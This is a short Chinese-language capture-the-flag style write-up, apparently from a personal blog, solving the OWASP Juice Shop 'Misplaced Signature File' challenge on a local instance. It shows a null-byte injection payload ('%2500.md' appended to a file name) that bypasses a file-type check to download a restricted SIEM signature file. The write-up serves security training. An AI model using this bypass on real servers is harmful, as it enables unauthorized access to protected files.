# 【Juice-Shop】★★★★ Misplaced Signature File：通过 Null Byte 注入访问错误放置的 SIEM 签名文件


# 【juice-shop】★★★★ Misplaced Signature File：通过 Null Byte 注入访问错误放置的 SIEM 签名文件

## 0x01 任务简报

<blockquote style="border-left: 5px solid #ff6b6b; background-color: #ffe0e0; padding: 20px; margin: 1.5rem 0; color: #c92a2a; line-height: 1.8; border-radius: 0 5px 5px 0;">
<div style="font-weight: bold; font-size: 1.1rem; margin-bottom: 10px; display: flex; align-items: center;">
<span style="margin-right: 8px;">🎯</span> 挑战目标
</div>
访问放置错误的 <a href="https://github.com/Neo23x0/sigma">SIEM 签名</a>文件。
</blockquote>

<blockquote style="border-left: 5px solid #6f42c1; background-color: #f5f3ff; padding: 20px; margin: 1.5rem 0; color: #5521b5; line-height: 1.8; border-radius: 0 5px 5px 0;">
<div style="font-weight: bold; font-size: 1.1rem; margin-bottom: 10px; display: flex; align-items: center;">
<span style="margin-right: 8px;">💡</span> 官方提示 (Hints)
</div>
1. 您需要欺骗安全机制，使其认为您想要的文件具有有效的文件类型。<br>
2. 若您已解决其他四个文件访问挑战中的任意一个，那么您应该已经知道 SIEM 签名文件的位置。<br>
3. 只需重复使用对上述文件已奏效的技巧即可。
</blockquote>

---

## 0x02 实战：复现漏洞

### 步骤1：访问 FTP 目录

基于之前文件访问挑战的经验，直接访问 FTP 目录：

```
http://127.0.0.1:3000/ftp/
```

在目录列表中发现错误放置的 SIEM 签名文件 `suspicious_errors.yml`。

<!-- 缺失图片（迁移时丢失）：assets/Pastedimage20260418001111.png -->
> ⚠️ 此处原有一张截图（FTP 目录），在迁移过程中丢失，暂时无法显示。

### 步骤2：使用 Null Byte 注入绕过访问限制

在文件名后添加 `%2500.md` 进行 Null Byte 注入：

```
http://127.0.0.1:3000/ftp/suspicious_errors.yml%2500.md
```

**结果：** 成功访问 `suspicious_errors.yml` 文件，挑战完成！🎉




---

> 作者: 御衡  
> URL: https://www.leobenchoi.com/posts/2026/juice-shop-misplaced-signature-file/  

